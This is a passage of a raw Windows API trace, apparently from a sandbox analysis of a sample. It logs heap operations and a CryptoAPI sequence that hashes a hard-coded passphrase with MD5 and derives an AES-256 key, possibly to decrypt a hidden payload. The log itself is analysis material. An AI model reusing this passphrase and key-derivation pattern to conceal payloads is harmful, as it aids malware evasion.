lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0127.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0127.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0127.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0127.116] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0127.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0127.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0127.116] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0127.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0127.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0127.117] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.117] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0127.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca988, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0127.117] CryptHashData (hHash=0x41ac540, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0127.117] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.117] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0127.117] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0127.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca808, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0127.117] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac2c0) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0127.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0127.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0127.120] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0127.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0127.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0127.121] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0127.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0127.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0127.250] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0127.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0127.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0127.250] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0127.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0127.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0127.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0127.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0127.250] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0127.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0127.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0127.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0127.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0127.251] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0127.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0127.251] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0127.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0127.252] CryptDestroyHash (hHash=0x41ac540) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0127.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0127.253] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0127.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: 